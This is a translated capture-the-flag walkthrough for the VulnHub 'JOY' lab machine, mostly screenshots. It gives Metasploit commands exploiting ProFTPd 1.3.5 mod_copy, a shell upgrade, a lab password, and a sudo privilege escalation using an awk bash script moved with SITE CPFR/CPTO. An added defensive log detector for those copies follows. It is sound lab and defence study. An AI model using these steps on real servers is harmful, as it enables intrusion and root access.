JOY Target Machine
For personal entertainment only
Target information
Download: https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
1. Host Scanning
![](https://upload-images.jianshu.io/upload_images/4664072-d74087ebfe2e54ea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2. Information Gathering and Exploitation
![](https://upload-images.jianshu.io/upload_images/4664072-578d2db2f37c632c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-28ea7f8044e1efa5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6ad9b6ee1d5e13ff.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-0028864e7ca6ffa3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The FTP service allows the anonymous user (anonymous) to log in
![](https://upload-images.jianshu.io/upload_images/4664072-6ef46ade5b9ad1df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Or
![](https://upload-images.jianshu.io/upload_images/4664072-f928951677e0d576.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3f437bf38ffa4503.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-510a5d5fe319d3b3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Because version_control sits under patrick's path, we have no permission to fetch it, so we try transferring it to the /upload path
![](https://upload-images.jianshu.io/upload_images/4664072-51741c752745c7e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e9c20bb20de217dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Sensitive information
ProFTPd: 1.3.5
/var/www/tryingharderisjoy
![](https://upload-images.jianshu.io/upload_images/4664072-1855ab477e817ce4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d27bf2a05242168b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Fault; change the IP
use exploit/unix/ftp/proftpd_modcopy_exec
set rhosts 192.168.74.130
set sitepath /var/www/tryingharderisjoy
run
python -c 'import pty; pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-3c9e60b7b2015e51.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-86e73b77fcf68575.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
su -l patrick apollo098765
Privilege escalation
Write the script on the local host
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
Upload it to upload over FTP as anonymous
![](https://upload-images.jianshu.io/upload_images/4664072-7e386e44b1b6a3f7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-05668887af0219d3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Then use telnet to change its path
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test
Run the script
sudo /home/patrick/script/test
cd /root
cat proof.txt
![](https://upload-images.jianshu.io/upload_images/4664072-92412f0cd3dbf61b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
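Seen from the defender's side, both `site cpfr` / `site cpto` copies in this walkthrough leave a recognisable pair of FTP commands. The following is an added example, not part of the original write-up: it pairs those commands in an FTP command log and flags risky copies. The `<time> <client> <user> <command>` line layout, the `-` marker for a session that has not logged in, the timestamps, client addresses and the `SENSITIVE_DEST` list are all assumptions constructed for illustration.

```python
import re

# Constructed sample log (assumed layout: "<time> <client> <user> <command>").
SAMPLE_LOG = """\
2019-09-20T10:01:02 192.168.74.1 - SITE CPFR /home/patrick/version_control
2019-09-20T10:01:03 192.168.74.1 - SITE CPTO /home/ftp/upload/version_control
2019-09-20T10:07:40 192.168.74.1 anonymous STOR test
2019-09-20T10:08:11 192.168.74.1 - SITE CPFR /home/ftp/upload/test
2019-09-20T10:08:12 192.168.74.1 - SITE CPTO /home/patrick/script/test
2019-09-20T10:09:00 192.168.74.9 alice SITE CPFR /home/alice/a.txt
2019-09-20T10:09:01 192.168.74.9 alice SITE CPTO /home/alice/b.txt
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) SITE (CPFR|CPTO) (\S+)$", re.I)
# Assumption: destinations worth alerting on, taken from the paths in this write-up.
SENSITIVE_DEST = ("/var/www/", "/home/patrick/script/")

def tree(path):
    """Return the first two path components, e.g. /home/patrick."""
    return "/".join(path.split("/")[:3])

def find_copies(log_text):
    """Pair each CPTO with the preceding CPFR from the same client and flag risky copies."""
    pending, findings = {}, []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # not a SITE CPFR/CPTO line
        ts, client, user, verb, path = m.groups()
        if verb.upper() == "CPFR":
            pending[client] = path
            continue
        src = pending.pop(client, None)
        if src is None:
            continue  # CPTO with no matching CPFR
        reasons = []
        if user == "-":
            reasons.append("unauthenticated")
        if tree(src) != tree(path):
            reasons.append("cross-tree")
        if path.startswith(SENSITIVE_DEST):
            reasons.append("sensitive-destination")
        if reasons:
            findings.append((ts, client, src, path, reasons))
    return findings

if __name__ == "__main__":
    for finding in find_copies(SAMPLE_LOG):
        print(finding)
```

On the sample, the copy out of patrick's directory and the copy into `/home/patrick/script/` are both reported, while the copy inside alice's own directory is not.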
Done
Reference article: https://blog.csdn.net/weixin_44214107/article/details/101228240